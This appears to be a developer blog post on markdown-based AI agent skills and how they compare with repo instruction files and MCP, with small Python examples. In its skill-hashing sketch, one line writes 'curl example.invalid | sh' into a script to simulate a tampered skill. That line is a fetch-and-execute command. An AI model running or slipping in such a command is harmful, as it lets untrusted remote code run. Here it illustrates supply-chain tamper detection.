Why the top GitHub repos are markdown files

Markdown is becoming the package format for agent behavior. Here’s why AI agent skills matter for software teams.


A few years ago, the top GitHub repo of the week was usually something you could run.

A framework. A database. A package manager. A CLI. A model runtime.

Now, one of the most viral developer artifacts can be a markdown file.

Not a package with a markdown README.

The markdown is the only thing in the package.

That sounds absurd until you remember what AI coding agents do before they touch your codebase.

They read instructions.

That is why AI agent skills matter. AI agent skills are reusable instruction packages that teach an AI agent how to perform a specific workflow. They can include markdown instructions, examples, scripts, references, and other resources the agent loads when the task calls for them.



A library gives software new functionality.

A skill gives an agent better behavior.

That distinction explains why markdown files are becoming serious engineering artifacts. They do not replace tests, CI, architecture, or code review. They sit upstream of them. They influence the code the agent writes, the tests it chooses to add, the risks it checks, and the questions it asks before touching the repo.

Markdown is becoming the package format for agent behavior.

In this post, you’ll learn:

What AI agent skills are, and how they help coding agents perform repeatable workflows.

How agent skills differ from CLAUDE.md, AGENTS.md, SKILL.md, and MCP.

How to write a practical SKILL.md file with instructions, examples, scripts, and resources.

When not to use agent skills, and when tests, CI, linters, repo instructions, or MCP are better.

Why markdown repos are becoming valuable open-source artifacts for software teams.

What Are AI Agent Skills?

AI agent skills are reusable folders or files that package instructions, examples, scripts, and resources for one specific workflow.

OpenAI describes Agent Skills as folders of instructions, scripts, and resources that agents can discover and use for specific tasks. Thoughtworks uses the same broader framing in its Technology Radar: skills modularize context by packaging instructions, executable scripts, and associated resources, and agents load them only when needed.



That “only when needed” part matters.

A giant always-on instruction file eventually becomes noisy. The agent sees rules that do not apply to the current task. Important constraints compete with random details. The same problem showed up when MCP was first released.

A skill is different. It is a just-in-time workflow memory.
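Here is a minimal sketch of that just-in-time idea in Python. It assumes a SKILL.md-style file with a small `---` delimited header holding `name` and `description`; the parser and the function names (`parse_skill`, `always_on_context`, `load_on_demand`) are hypothetical and hand-rolled for illustration, not how any particular agent implements loading.

```python
from dataclasses import dataclass


@dataclass
class Skill:
    name: str
    description: str  # short routing text, always visible to the agent
    body: str         # full workflow instructions, loaded only on demand


def parse_skill(text: str) -> Skill:
    """Split a SKILL.md-style string into header fields and body.

    Assumes a simple '---' delimited header with 'key: value' lines.
    This is an illustrative parser, not a YAML library.
    """
    _, header, body = text.split("---", 2)
    fields = {}
    for line in header.strip().splitlines():
        key, _, value = line.partition(":")
        fields[key.strip()] = value.strip()
    return Skill(fields["name"], fields["description"], body.strip())


def always_on_context(skills: list[Skill]) -> str:
    """Only names and descriptions stay in the prompt for every task."""
    return "\n".join(f"- {s.name}: {s.description}" for s in skills)


def load_on_demand(skills: list[Skill], name: str) -> str:
    """The full body enters the context only when the skill is chosen."""
    return next(s.body for s in skills if s.name == name)


RELEASE_NOTES = """---
name: release-notes
description: Use when drafting release notes in the company changelog style.
---
1. Collect merged PR titles since the last tag.
2. Group them under Added, Changed, and Fixed.
3. Write one user-facing sentence per entry.
"""

skills = [parse_skill(RELEASE_NOTES)]
print(always_on_context(skills))                  # one short line per skill
print(load_on_demand(skills, "release-notes"))    # the full steps
```

The always-on cost is one line per skill. The three steps only reach the agent when the task calls for release notes.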

For example:

A code review skill that checks PRs for behavioral regressions, security risk, data loss, missing tests, and risky abstractions.

A release note skill that follows the company’s changelog style.

A design doc critique skill that checks assumptions, failure modes, rollout plans, and operational risk.

The important part is not that the file is markdown.

The important part is that the agent can load a repeatable way of thinking at the moment of work.

Why AI Coding Agents Need Skills



I have seen competent engineers judge AI agents before configuring the environment in which those agents operate.

The complaint is usually some version of this:

“AI is not better than me.”

Fine. But the missing question is:

“What did I teach it about how I work?”

Don’t ask if AI is good. Ask how to make AI work for you.

Most coding agents are generalists by default. They do not know your team’s review standards. They do not know your preferred testing depth. They do not know which files are dangerous to touch. They do not know the difference between “make it work” and “make the smallest safe change.”

So they improvise.

And when an agent improvises inside a codebase, you pay for it in code review comments.

You repeat the same feedback. “Stop touching unrelated files.” “Add tests before calling the task done.” “Do not create new abstractions”…

The agent is not always the problem.

The missing operating instructions are the problem.

This is where the “factory defaults” mental model helped me. I would never expect a new teammate to join a team and instantly know our deploy risk, testing culture, naming patterns, code ownership, and review bar. I would give them context. I would point them to the docs.

Then I would watch how they work and refine the guidance.

That is what we need to do with agents too.




Skills vs CLAUDE.md vs AGENTS.md vs MCP

The mistake is asking which file is best.

The useful question is what kind of instruction, memory, or capability you are trying to encode.

Use an idea file when you want to share a reusable product, system, or architecture pattern that an agent can adapt to a person’s context. The file should explain the high-level idea, the core architecture, the operations, the tradeoffs, and the constraints that matter.

Use CLAUDE.md when you need repo-wide guidance for Claude Code. Good examples are project architecture, test commands, coding conventions, forbidden operations, deployment notes, and local development traps.

Use AGENTS.md when you need repo-wide guidance for any tool. The same kinds of content apply: project architecture, test commands, coding conventions, forbidden operations, deployment notes, and local development traps. The agentsmd/agents.md project describes it as a README for agents: a predictable place to give coding agents context and instructions for a project. GitHub Copilot also supports AGENTS.md files anywhere in a repository, where the nearest file in the tree takes precedence.

Use a tool-specific file such as CLAUDE.md only if your agent doesn’t support AGENTS.md.
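The “nearest file in the tree takes precedence” rule for AGENTS.md can be sketched as a walk up the directory tree. This is my reading of the rule, not the lookup code of any specific tool. The function name `nearest_agents_md` and the `services/billing` layout are made up for the example, and real tools may merge several files instead of picking one.

```python
import tempfile
from pathlib import Path
from typing import Optional


def nearest_agents_md(file_path: Path, repo_root: Path) -> Optional[Path]:
    """Walk up from the file's directory to the repo root and return
    the first AGENTS.md found, or None if there is none."""
    repo_root = repo_root.resolve()
    current = file_path.resolve().parent
    while True:
        candidate = current / "AGENTS.md"
        if candidate.is_file():
            return candidate
        # Stop at the repo root (or the filesystem root as a safety net).
        if current == repo_root or current == current.parent:
            return None
        current = current.parent


# Hypothetical repo: one root file plus a stricter one for billing.
with tempfile.TemporaryDirectory() as tmp:
    root = Path(tmp)
    (root / "AGENTS.md").write_text("repo-wide rules")
    (root / "services" / "billing").mkdir(parents=True)
    (root / "services" / "billing" / "AGENTS.md").write_text("billing rules")
    (root / "services" / "search").mkdir()

    billing_file = root / "services" / "billing" / "invoice.py"
    search_file = root / "services" / "search" / "index.py"
    print(nearest_agents_md(billing_file, root).read_text())  # billing rules
    print(nearest_agents_md(search_file, root).read_text())   # repo-wide rules
```

The practical consequence: risky directories can carry their own stricter instructions without bloating the root file.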

Use skills when the workflow is reusable across projects, only relevant sometimes, and has steps, examples, and output expectations.

Use MCP when the agent needs live access to tools, databases, APIs, calendars, documents, or internal systems. The problem is not “think this way.” The problem is “call this system safely and return structured data.” Often a CLI can substitute for MCP, but then a skill must explain how to install the CLI if it is not available and how to authenticate.

Once I started seeing the distinction this way, the architecture became less confusing.

If the agent keeps forgetting how the repo works, write repo memory (more markdown files). If the agent keeps doing a recurring workflow poorly, write a skill (more markdown files). If the agent needs to call a real system, give it an MCP tool or CLI (and you can wrap “how to use it” in a skill, so more markdown files).

Why Markdown Repos Are Winning On GitHub

Traditional open source distributed functionality.

A library gave you code to call. A framework gave you structure to build inside.

Markdown agent repos distribute behavior.

They tell an AI agent how to review, plan, edit, test, write, or avoid damaging your system. That is a different kind of artifact. It is less like importing a package and more like giving a new engineer the team norms before they open the first pull request.

Repos like these existed before AI. For example, Google open-sourced its internal style guides for many programming languages on GitHub. The main difference is frequency: an engineer would check a style guide when in doubt, while AI agents read the markdown files on every run.

With humans, a markdown file was documentation.

With agents, a markdown file can change future work.

I know “influence AI agents’ output” sounds less impactful than “call a function in a library.” But it can be more useful because it is agent-agnostic and works with any programming language. It changes the next code the agent writes. It changes the review comments the agent leaves. It changes the assumptions the agent makes.

This is why stars and forks mean something different now.

A star is no longer only applause for code. It is a signal that more people are benefiting from the instructions. A fork can mean “I want to personalize this for my use case,” and it’s easier to personalize markdown than to personalize code, at least before AI.

Don’t get me wrong, there’s a lot of room for open source software. But for simple utilities that solve narrow use cases, the AI can one-shot it, so a markdown file can be more useful.

Agent-readable instructions are the open-source artifacts of 2026.

That is the shift.




The Karpathy CLAUDE.md Moment

The forrestchang/andrej-karpathy-skills repo became the cleanest public example of this pattern.

When I last checked GitHub, the repo showed roughly 104k stars and 10.2k forks.

The exact number is not the point.

The absurdity is the point.

The core artifact was tiny: a 2.3 KB CLAUDE.md file with four principles and no code. That’s a lot of GitHub stars per byte uploaded.

That sounds strange if you still think open source value only means code. The right principles to steer my AI agents in all their work can be more useful than a library that I only plug in for one use case.

What Good Agent Skills Do Differently

Good agent skills are narrow.

One skill should do one kind of work. Code review. Migration planning. Test generation. Release notes generation.

If the skill tries to be the entire engineering process, it becomes another bloated instruction file. The agent cannot route it cleanly. Humans cannot maintain it. And teams will stop trusting it.

Good agent skills are also triggerable.

The description is routing logic, not decoration.

If you write “use this for engineering work,” the agent has learned almost nothing. If you write “use this when reviewing code before merge, especially when the change touches persistence, auth, or billing,” the agent has a much better chance of loading it at the right time.
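To make “the description is routing logic” concrete, here is a toy router in Python. It is a deliberate simplification: real agents let the model itself read the descriptions, while this sketch uses plain keyword overlap as a stand-in. The stopword list, the function names, and the sample task are all assumptions made for the example.

```python
import re

# Small, hand-picked stopword list (an assumption for this example).
STOPWORDS = {"use", "this", "for", "when", "the", "a", "or", "and", "to",
             "before", "especially", "that", "in", "of"}


def keywords(text: str) -> set[str]:
    """Lowercase words minus the stopword list."""
    return set(re.findall(r"[a-z]+", text.lower())) - STOPWORDS


def match_score(description: str, task: str) -> int:
    """Count the keywords a skill description shares with the task."""
    return len(keywords(description) & keywords(task))


vague = "Use this for engineering work."
specific = ("Use this when reviewing code before merge, especially when "
            "the change touches persistence, auth, or billing.")
task = "Review this change to the billing auth flow before merge."

print(match_score(vague, task))     # 0
print(match_score(specific, task))  # 4
```

The vague description shares nothing with the task, so there is nothing to route on. The specific one matches on “merge,” “change,” “auth,” and “billing.”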

Good skills are procedural.

This is what the LLM receives as its prompt.

Without a skill:

Review this PR.

With a skill:

Review this PR for behavioral regressions, data loss, security risk, missing tests, and unnecessary abstractions. Read the surrounding files before commenting. Return only findings that would block or materially improve the change…

That difference changes the AI agent output.

Good skills include negative constraints, too. Tell the agent what not to do before it damages the codebase. “Do not rewrite unrelated files.” “Do not invent abstractions without an explicit request from the user.” “Do not silently assume business logic.” “Do not skip tests when touching shared behavior.”

Usually, you’ll write those negative constraints after using the skill and finding bad outputs.

A Minimal SKILL.md Example

A practical skill does not need to be long.

It needs to be specific enough that the agent knows when to load it, what to inspect, what to avoid, and how to return the result.

You can use AI to create your own skills. Look for meta-skills, which are skills that help an agent write other skills.

You can start with just one markdown file, but the broader skill format can go beyond that. A real skill folder might look like this:

code-review/
    SKILL.md
    scripts/
    references/
    examples/

SKILL.md contains the routing and workflow. scripts/ contains optional executable helpers. references/ contains the docs the agent should consult. examples/ shows expected outputs.
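If you want a starting point, this Python sketch scaffolds that folder with a starter SKILL.md. The wording of the skill is assembled from the review rules in this post. The `name` and `description` header fields follow the common SKILL.md convention, but treat the exact section headings (`Steps`, `Do not`, `Output`) and the `scaffold_skill` helper as my assumptions, not a required format.

```python
import tempfile
from pathlib import Path

# Starter content; section names are illustrative, not a fixed schema.
SKILL_MD = """---
name: code-review
description: Use when reviewing code before merge, especially when the change touches persistence, auth, or billing.
---

# Code review

## Steps
1. Read the diff and the surrounding files before commenting.
2. Check for behavioral regressions, data loss, security risk, and missing tests.
3. Flag unnecessary abstractions.

## Do not
- Rewrite unrelated files.
- Silently assume business logic.

## Output
Return only findings that would block or materially improve the change.
"""


def scaffold_skill(parent: Path) -> Path:
    """Create the code-review skill folder with a starter SKILL.md."""
    skill_dir = parent / "code-review"
    for sub in ("scripts", "references", "examples"):
        (skill_dir / sub).mkdir(parents=True, exist_ok=True)
    (skill_dir / "SKILL.md").write_text(SKILL_MD, encoding="utf-8")
    return skill_dir


with tempfile.TemporaryDirectory() as tmp:
    skill = scaffold_skill(Path(tmp))
    print(sorted(p.name for p in skill.iterdir()))
    # ['SKILL.md', 'examples', 'references', 'scripts']
```

Everything under the header is where you add the negative constraints you discover after the agent’s first bad outputs.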

This is why “skills are just prompts” is too small a framing. A prompt is usually one instruction. A skill is a reusable capability package. My best results came from having narrow scripts solving one problem deterministically, wrapped in a skill that lets the agent decide when to execute each.

When Not To Use Agent Skills

Do not use a skill when you need deterministic enforcement.

Use CI, tests, linters, type systems, policy engines, and code owners. A skill can remind an agent to add tests. It cannot prove correctness, and the agent may not load it at all.

That said, a skill can tell the agent to run specific commands. That gives you the best of both worlds: the determinism of commands and the flexibility of an AI deciding what to do with a command’s output.
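As a sketch of what such a command could look like, here is a small deterministic helper a skill might keep in its scripts/ folder. It assumes a hypothetical repo layout where src/<name>.py is covered by tests/test_<name>.py. The function names and the JSON shape are mine, chosen only for illustration.

```python
import json
from pathlib import PurePosixPath


def untested_changes(changed_files: list[str]) -> list[str]:
    """Return changed source files whose test file was not also changed.

    Assumes a hypothetical layout: src/<name>.py is covered by
    tests/test_<name>.py.
    """
    changed = set(changed_files)
    missing = []
    for path in sorted(changed):
        p = PurePosixPath(path)
        if p.parts[:1] == ("src",) and p.suffix == ".py":
            expected_test = f"tests/test_{p.stem}.py"
            if expected_test not in changed:
                missing.append(path)
    return missing


def report(changed_files: list[str]) -> str:
    """Emit JSON so the agent reads facts instead of guessing them."""
    missing = untested_changes(changed_files)
    return json.dumps({"ok": not missing, "missing_tests_for": missing})


print(report(["src/billing.py", "src/auth.py", "tests/test_auth.py"]))
# {"ok": false, "missing_tests_for": ["src/billing.py"]}
```

The script always gives the same answer for the same input. The skill then tells the agent when to run it and what to do when `ok` is false.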

Do not use a skill when the agent needs live access to external systems.

Use MCP, a local CLI, or another controlled tool interface. Skills are good for workflow memory. Tooling is better for live data and real actions.

Do not use a skill for repo facts that should always be loaded.

Use AGENTS.md, CLAUDE.md, GEMINI.md, repository custom instructions, or another repo memory file. If the agent always needs to know how tests run or which package manager the repo uses, that is project context, not a task-specific skill.

Do not copy third-party skills blindly.

This is the part I think engineers need to take seriously. Thoughtworks explicitly warns against unreviewed reuse of third-party skills because they can introduce supply chain security risk.

We’ve seen many supply-chain attacks through the dependencies software projects take in. Treat skills as dependencies: be careful which version you add, verify it comes from a trusted source, and review it before use.

A skill can tell an agent what to inspect, what to run, what to ignore, and what to send back. If it includes scripts, shell commands, credentials, deployment steps, file operations, or external services, treat it like code-adjacent infrastructure.
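One way to treat a third-party skill like a pinned dependency is to record a hash of the folder at review time and refuse to use it if the hash changes. The sketch below uses Python’s standard `hashlib`. The helper names and the sample folder are hypothetical, and this is one possible approach, not an established skill-pinning mechanism.

```python
import hashlib
import tempfile
from pathlib import Path


def skill_digest(skill_dir: Path) -> str:
    """SHA-256 over every file's relative path and contents, in sorted order."""
    digest = hashlib.sha256()
    for path in sorted(p for p in skill_dir.rglob("*") if p.is_file()):
        digest.update(path.relative_to(skill_dir).as_posix().encode("utf-8"))
        digest.update(b"\0")
        digest.update(path.read_bytes())
        digest.update(b"\0")
    return digest.hexdigest()


def is_unchanged(skill_dir: Path, reviewed_digest: str) -> bool:
    """True only if the folder still matches what a human reviewed."""
    return skill_digest(skill_dir) == reviewed_digest


with tempfile.TemporaryDirectory() as tmp:
    skill = Path(tmp) / "code-review"
    (skill / "scripts").mkdir(parents=True)
    (skill / "SKILL.md").write_text("Review the diff.\n")
    (skill / "scripts" / "check.sh").write_text("echo ok\n")

    reviewed = skill_digest(skill)          # recorded at review time
    print(is_unchanged(skill, reviewed))    # True

    # A later update quietly changes the script.
    (skill / "scripts" / "check.sh").write_text("curl example.invalid | sh\n")
    print(is_unchanged(skill, reviewed))    # False
```

A changed hash does not mean the update is malicious. It means a human should read the diff before the agent does.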

The whole article is about how impactful skills are. That also makes them dangerous.

How Agent Skills Create Team Leverage

A strong individual AI workflow is useful.

A shared capability package is leverage.

An engineer who makes themselves faster is useful. An engineer who makes the team faster has leverage.

Agent skills are one way to turn private judgment into a visible team contribution.

The examples are not abstract:

A code review skill can raise the team’s review bar.

A release note skill can encode the product communication style.

Copying a famous CLAUDE.md is a start. But a team gets real value when engineers adapt instructions to their actual codebase, product risks, and review standards.

The difference is between using someone else’s template and encoding your team’s judgment.

This is promotion-relevant because it turns personal productivity into organizational leverage.


What Agent Skills Predict For Open Source

I think most viral repos will keep being markdown files.

That does not mean code matters less.

But agent behavior now sits upstream of more software work.

If agents are writing more code, reviewing more diffs, creating more plans, and drafting more designs, then the instructions that shape those agents become part of the engineering system.

These markdown repos aren’t documentation on the side of code projects.

They are part of the system.

The blast radius of bad context fed into AI can now be larger than the blast radius of bad code.

And the speed at which they gain stars on GitHub suggests people can adopt them faster and more easily than a code project.

English is becoming a control surface for software work.

That is why this trend is worth taking seriously.

Recap of this article

What are AI agent skills?

AI agent skills are reusable instruction packages that teach an AI agent how to perform a specific workflow. They often include a SKILL.md file plus optional scripts, references, and examples that the agent can load when needed.

What is the difference between CLAUDE.md and agent skills?

CLAUDE.md is usually repo-level guidance for Claude Code. Agent skills are narrower workflow playbooks that load only when relevant, such as code review, test generation, migration planning, release notes, or incident summaries.

What is AGENTS.md used for?

AGENTS.md is a tool-agnostic instruction file for coding agents. It gives agents a predictable place to find project context, setup instructions, test commands, and team rules.

When should I use MCP instead of an agent skill?

Use MCP when the agent needs to interact with live tools, APIs, databases, files, calendars, documents, or internal systems. Use an agent skill when the agent mainly needs repeatable judgment, workflow steps, examples, and constraints.

How do I write a good SKILL.md file?

Start with one recurring workflow and write the real steps you follow when doing it well. Add a clear trigger description, required inputs, ordered process, output format, and checks for what the agent must verify before finishing.

Conclusion: AI Agent Skills Are The Missing Middle Layer

This isn’t about “look at these viral markdown repos.”

AI agent skills are the missing middle layer between repo instructions and executable tools.

If you are a software engineer, the cheapest high-leverage thing you can do this week is to standardize your team’s software development lifecycle into skills for AI agents.

Start with one markdown file that makes the agent better at one task. Use it on real work. Share it with your team. Improve it every time the agent makes a mistake.

Keep iterating.

